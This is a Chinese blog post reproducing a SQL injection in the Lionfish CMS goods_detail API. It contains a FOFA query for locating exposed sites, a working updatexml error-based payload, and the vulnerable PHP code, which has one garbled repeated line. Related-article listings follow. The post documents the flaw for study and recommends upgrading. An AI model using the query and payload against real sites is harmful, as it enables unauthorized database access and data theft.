狮子鱼SQL注入漏洞复现

最新推荐文章于 2024-08-06 01:32:36 发布
最新推荐文章于 2024-08-06 01:32:36 发布
阅读量1.6k 收藏 4
点赞数
CC 4.0 BY-SA版权
分类专栏: 漏洞复现 文章标签: sql 数据库 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45429101/article/details/129732937
文章详细介绍了狮子鱼CMS在ApiController.class.php中的一个SQL注入漏洞,通过fofa语法和特定payload可以复现该问题。代码中未对参数进行严格过滤,导致可以直接拼接SQL执行。修复建议是升级到最新版本以解决此安全风险。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

狮子鱼cms sql注入漏洞复现

一、前言

狮子鱼CMS是一款管理系统。在 ApiController.class.php处 参数过滤存在不严谨,导致SQL注入漏洞

二、环境搭建与复现

fofa语法: “/seller.php?s=/Public/login”
界面如下 在这里插入图片描述
执行payload:https://www.xxx.com/index.php?s=api/goods_detail&goods_id=1%20and%20updatexml(1,concat(0x7e,database(),0x7e),1)
结果:
在这里插入图片描述漏洞分析:ApiController.class.php

public function goods_detail()
    {
        $goods_id = I('get.goods_id');
        //gallery =>img_url
        //goods goods.goods_desc  goods_name group_price  market_price  sell_count group_number 

        $sql="select g.*,gd.description,gd.summary,gd.tag from ".
        C('DB_PREFIX')."goods g,".C('DB_PREFIX')."goods_description gd where g.goods_id=gd.goods_id and g.goods_id=".$goods_id;

        $goods_arr=M()->query($sql);

        $qian=array("\r\n");
        $hou=array("<br/>");
        $goods_arr[0]['summary'] = str_replace($qian,$hou,$goods_arr[0]['summary']); 

        $sql="select image from ".C('DB_PREFIX')."goods_image where goods_id=".$goods_id;
        $goods_image=M()->query($sql);

        $gallery = array();
        $default_image = '';
        foreach($goods_image as $val)
        {
            $val['img_url'] = str_replace('http','https',C('SITE_URL')).'/Uploads/image/'.$val['image'];

            if(empty($default_image))
            {
                $default_image = str_replace('http','https',C('SITE_URL')).resize($val['image'], C('goods_thumb_width'), C('goods_thumb_height'));
            }

            $gallery[] = array('img_url' => $val['img_url']); 
        }

        $goods = $goods_arr[0];

sql="selectimagefrom".C(′DBPREFIX′)."goodsimagewheregoodsid=".sql="select image from ".C('DB_PREFIX')."goods_image where goods_id=".sql="selectimagefrom".C(DBPREFIX)."goodsimagewheregoodsid=".goods_id;
传参时并没有做过滤,直接拼接导致的sql注入。

修复建议:升级到最新版本

漏洞复现狮子CMS某SQL注入漏洞
晚风不及你
02-09 1703
狮子CMS(Content Management System)是一种网站管理系统,它旨在帮助用户更轻松地创建和管理网站。该系统拥有用户友好的界面和丰富的功能,包括页面管理、博客、新闻、产品展示等。通过简单直观的管理界面,网站所有者可以方便地进行内容的发布、管理和布局。
【1day】狮子CMS注入漏洞学习(2个)
记录并分享学习安全的知识点..
07-07 1344
狮子CMS注入漏洞学习
狮子cms-sql注入漏洞复现
weixin_68647219的博客
09-06 3263
工作发现,狮子cms存在sql注入漏洞,该漏洞是由于狮子CMS ApiController.class.php 参数过滤存在不严谨可能导致SQL注入漏洞
[漏洞挖掘]SRC-狮子CMS-SQL注入
wwxxee
05-20 7896
狮子cms-SQL注入 狮子CMS ApiController.class.php 参数过滤存在不严谨,导致SQL注入漏洞 FOFA语法: “/seller.php?s=/Public/login” 后台登录界面 漏洞点:ApiController.class.php public function goods_detail() { $goods_id = I('get.goods_id'); //gallery =>img_url /
狮子cms-SQL注入
weixin_46663238的博客
10-20 2354
狮子CMS ApiController.class.php 参数过滤存在不严谨,导致SQL注入漏洞 FOFA语法: “/seller.php?s=/Public/login” 后台登录界面 漏洞点:ApiController.class.php public function goods_detail() { $goods_id = I('get.goods_id'); //gallery =>img_url //go...
漏洞复现狮子CMS某SQL注入漏洞01
晚风不及你
02-09 1289
狮子CMS(Content Management System)是一种网站管理系统,它旨在帮助用户更轻松地创建和管理网站。该系统拥有用户友好的界面和丰富的功能,包括页面管理、博客、新闻、产品展示等。通过简单直观的管理界面,网站所有者可以方便地进行内容的发布、管理和布局。
后台管理系统SQL注入漏洞
hackzkaq的博客
10-20 571
在进行fofa盲打站点的时候,来到了一个后台管理处看到集市二字,应该是edu站点。确认目标身份(使用的quake进行然后去ipc备案查询)网站后台很像cms搭建的,在查看网站时发现。还有其他的,打算一个一个尝试看看。直接去百度一手,发现有个。
狮子 CMS ApiController.class.php SQL 注入漏洞
网安小白
08-04 359
本章提供的所有内容仅供学习、交流和分享用途,只供参考。本站资源禁止并谢绝未经本站许可的使用,如若欲转载,请署名以及注明出处,请务必以文字链接的形式标明或保留文章原始出处和作者的信息。本站(原创)文章、资源、图片等所有内容,一经转载,即表示您已经接受上述声明!需自行承担一切风险与责任; 漏洞描述 狮子 CMS ApiController.class.php 参数过滤存在不严谨,导致 SQL 注入漏洞 漏洞影响 狮子CMS FOFA "/seller.php?s=/Public/login"
Casdoor SQL注入漏洞复现,编号:CVE-2022-24124
08-31 3099
漏洞属于Sql注入漏洞,在查询API 存在与字段和值参数相关的SQL 注入漏洞,如api/get-organizations 所示。
WeiPHP5.0 SQL注入(CNVD-2020-67556 )漏洞复现
weixin_68999845的博客
09-21 845
WeiPHP5.0 SQL注入(CNVD-2020-67556 ) 漏洞复现
GeoServer SQL 注入漏洞复现(CVE-2024-25157)附poc_geoserverl漏洞(2)
2401_83974607的博客
04-17 651
升级 org.geoserver.community:gs-jdbcconfig 到 2.21.4 或 2.22.2 或更高版本。使用方法:python CVE-2023-25157.py http://your-ip:8080/geoserver/ows。在进行注入之前,首先要获取地理图层列表信息,这是sql注入payload中的一个必要参数。标签中的信息,就是地理图层列表。成功获取到数据库版本号。2.获取每个功能名称。作为地理图层列表信息。4.构造SQL 注入
易宝OA ExecuteQueryForDataSetBinary SQL注入漏洞复现
0xSec
04-05 345
易宝OA ExecuteQueryForDataSetBinary接口处存在SQL注入漏洞,未经身份认证的攻击者可以通过此漏洞获取数据库敏感信息,用户名密码等凭据,进一步利用可获取服务器权限。
宏景eHR SQL注入漏洞复现(CNVD-2023-08743)
失心少年
06-20 1354
版权声明:本文为CSDN博主「OidBoy_G」的原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接及本声明。原文链接:https://blog.csdn.net/qq_41904294/article/details/130944159。宏景eHR 存在SQL注入漏洞,未经过身份认证的远程攻击者可利用此漏洞执行任意SQL指令,从而窃取数据库敏感信息。宏景eHR人力资源管理软件是一款人力资源管理与数字化应用相融合,满足动态化、协同化、流程化、战略化需求的软件。宏景eHR < 8.2。
youdiancms 9.5.0 版本 SQL注入(vulfocus复现
qq_40646572的博客
04-24 1909
从上述信息,可以看到,web服务的80端口被映射到62461端口,并且该服务对外开启了3306端口并映射到20130 端口。并且给了数据库的相关信息。
DVWA SQL注入漏洞复现
ch258563的博客
04-02 527
DVWA SQL注入漏洞复现
漏洞复现狮子CMS文件上传漏洞(wxapp.php)
晚风不及你
02-11 1713
狮子CMS(Content Management System)是一种网站管理系统,它旨在帮助用户更轻松地创建和管理网站。该系统拥有用户友好的界面和丰富的功能,包括页面管理、博客、新闻、产品展示等。通过简单直观的管理界面,网站所有者可以方便地进行内容的发布、管理和布局。
sql注入-常见注入方法复现
最新发布
dragon的博客
08-06 1045
报错注入是通过特殊函数错误使用并使其输出错误结果来获取信息的。是一种页面响应形式。响应过程:用户在前台页面输入检索内容后台将前台页面上输入的检索内容无加区别的拼接成sql语句,送给数据库执行数据库将执行的结果返回后台,后台将数据库执行的结果无加区别的显示在前台页面报错注入存在基础:后台对于输入输出的合理性没有做检查。
sql注入部分总结和复现
iteuko的博客
08-06 923
一个端口对应一个服务。
SQL注入检测论文复现
zji
07-06 602
Detection SQL Injection with Deep Learning 项目来自githunb 环境 tensorflow keras 说明 data目录下是使用的数据,包括一个xss样本、sql注入样本和负样本。 file目录保存训练好的词向量、预处理的数据、训练好的模型等。 log目录保存训练日志,可用tensorborad可视化。 RUN 训练嵌入式词向量 运行 word2vec_ginsim.py 运行processing.py预处理数据,生成训练数
狮子社区团购小程序v17.7
07-02
### 回答1: 狮子社区团购小程序v17.7是一款功能强大、便捷实用的团购平台。此小程序通过与社区居民的绑定,为用户提供了丰富的社区生活服务。 首先,狮子社区团购小程序v17.7具有便捷的购物功能。用户可以通过小程序直接浏览社区内各类商品,并将其加入购物车,最后一次性结算。这为用户省去了与线下购物相比的种种不便,同时,用户还能够享受到更多促销和团购优惠,更实惠地购物。 其次,该小程序还为社区居民提供线上团购平台。用户可以通过小程序发起团购活动,邀请其他社区居民参与,从而获得更多折扣或者独家优惠。这不仅增强了社区居民之间的互动和交流,还提升了团购的参与度和成功率。 此外,狮子社区团购小程序v17.7还设置了用户评价和推荐系统。用户可以对购买过的商品进行评价,为其他用户提供参考。同时,小程序会根据用户的购买和评价记录,为其推荐符合个人喜好的商品,提升用户体验。 最后,狮子社区团购小程序v17.7还致力于提供高质量的售后服务。用户可以通过小程序在线咨询客服,解决遇到的问题。同时,小程序还提供退换货等售后服务,保障用户权益。 总体来说,狮子社区团购小程序v17.7是一款完善的团购平台,为社区居民提供了便利、实惠和高效的购物体验。它不仅促进了社区居民之间的交流和互动,还为用户带来了更多优质的商品选择和服务。 ### 回答2: 狮子社区团购小程序v17.7是一款专注于社区团购的小程序。该小程序提供了丰富的功能和便捷的服务,为用户提供了更好的购物体验。 首先,狮子社区团购小程序v17.7具有强大的商品展示功能。用户可以在小程序中浏览到各种社区团购商品的详细信息,包括商品的图片、价格、规格、产地等。用户可以通过小程序轻松了解商品的特点和优势,选择心仪的商品进行购买。 其次,该小程序提供了便捷的购物流程。用户可以选择心仪的商品加入购物车,然后选择配送地址和支付方式。小程序支持多种支付方式,包括微信支付、支付宝等,用户可以根据自身需求选择适合自己的支付方式。通过简单的几步操作,用户就可以完成团购商品的购买。 此外,狮子社区团购小程序v17.7还提供了社区互动功能。用户可以在小程序中加入社区,与其他社区成员互动交流,分享购物心得和团购优惠信息。社区还将定期组织一些线下活动,让用户更好地认识社区成员,增加社区凝聚力。 总的来说,狮子社区团购小程序v17.7是一款功能强大、操作简便的小程序。它通过丰富的商品展示、便捷的购物流程和社区互动功能,为用户提供了更好的购物体验,帮助用户更便捷地参与社区团购活动。无论是购买商品还是参与社区互动,用户都能在这款小程序中找到满足自己需求的功能。 ### 回答3: 狮子社区团购小程序v17.7是一款专为社区居民量身定制的电商应用程序。该小程序集结了社区内商家的特色商品和服务资源,为社区居民提供便捷、优质的购物体验。 首先,狮子社区团购小程序v17.7致力于满足社区居民的各类购物需求。用户通过该小程序可以轻松浏览社区商家的商品和服务信息,包括生活用品、食品保健品、家居装饰、餐饮外卖等。居民可以根据自己的需要选择心仪的商品,并享受到便宜的团购价格。 其次,狮子社区团购小程序v17.7具备便捷的购物功能。用户可以通过该小程序实现商品的在线下单和支付,无需亲自去商家处购买,极大地提高了购物的便利性。用户可以随时随地进行下单,节省了购物的时间和精力。 此外,狮子社区团购小程序v17.7还积极推动社区居民之间的交流和互动。在该小程序中,用户可以发布和参与社区团购的活动,与邻居们一起团购商品,享受更多优惠。社区居民可以通过交流平台留言、评论、评分等方式,分享对商品和服务的评价和体验,帮助其他居民做出更明智的购买决策。 总之,狮子社区团购小程序v17.7是一款方便、实用的电商应用程序。通过该小程序,社区居民可以尽享便捷的购物体验,同时促进社区居民之间的交流和互动,提升社区居民的生活品质。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

asdnaiol

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值